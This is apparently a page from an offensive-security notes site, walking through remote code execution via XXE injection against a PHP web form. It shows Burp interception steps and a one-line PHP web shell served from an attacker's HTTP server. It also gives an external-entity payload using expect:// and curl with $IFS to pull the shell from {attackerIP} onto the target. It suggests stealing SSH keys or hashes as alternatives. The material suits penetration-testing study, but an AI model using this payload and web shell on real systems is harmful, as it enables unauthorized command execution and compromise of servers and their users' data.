RCE

the easiest method of gaining RCE with XXE is to look for ssh keys or attempt to utilize a hash stealing trick. however, the most efficient method is to fetch a web shell from the attacker's server and writing it to the webapp.

#once the internal XML entities are validated - use external file entities keyword to test for local file disclosure
#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 ...
 * submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /submitDetails.php HTTP/1.1
   <?xml version="1.0" encoding="UTF-8"?>
    <root>
     <name>First</name>
     <tel></tel>
     <email>[email protected]</email>
     <message>This is a test email</message>
    </root>

 * forms that appears to be sending user input data in an XML format can be tested for potential XXE vulnerability
    - the target page may be vulnerable to XXE injection if the user input isn't properly sanitized or safely parsed

#identify which elements are being displayed IOT know which elements to injext malicious xml input
#if no elements are displayed, utilize blind xxe injection method
BURP > Repeater
 Request
  ...
   <?xml version="1.0" encoding="UTF-8"?>
    <root>
     <name>First</name>
     <tel></tel>
     <email>[email protected]</email>
     <message>This is a test email</message>
    </root>
 Response
  ...
  HTTP/1.1 200 OK
   check your email [email protected] for verification...
  
 * the email field is reflected in the response and may be vulnerable to xxe injection
#The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work

#write a basic web shell to be uploaded to the target via xxe
root@oco:~$ echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
root@oco:~$ sudo python3 -m http.server 8080

#perform test & exploit xxe vulnerability to gain rce
BURP > Repeater
 Request
  ...
  POST /submitDetails.php HTTP/1.1
   <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE email [
    <!ENTITY webShell SYSTEM "expect://curl$IFS-O$IFS'{attackerIP}/shell.php'">
    ]>
    <root>
     <name>First</name>
     <tel></tel>
     <email>&webShell;</email>
     <message>This is a test email</message>
    </root>
    
 * if there is an xxe vulnerability, the XML entity named 'webShell' which is referenced by &webShell;
   should be replaced with the value defined (/home)
    
 Response
  ...
  HTTP/1.1 200 OK
   check your email testCompany for verification...
   ...
   ...
   
 * all spaces and characters that may break the XML format are replaced with $IFS (spaces)
    - characters that may break the XML format include |, >, & {
       - do not use these in the XML payload code
 
 * if the HTTP response displayed the xxe reference element "webShell;"
   instead of the webShell file being downloaded then the webapp isn't vulnerable
   to XXE Injection. 
   
 * if the XML input in the HTTP request had no DTD being declared within the XML data itself, or being referenced externally,
   DTD should be added before defining an entity; if the DOCTYPE is already declared in the XML request,
   only the ENTITY element is required
PreviousINFORMATION TAMPERINGNextEXFILTRATION

Last updated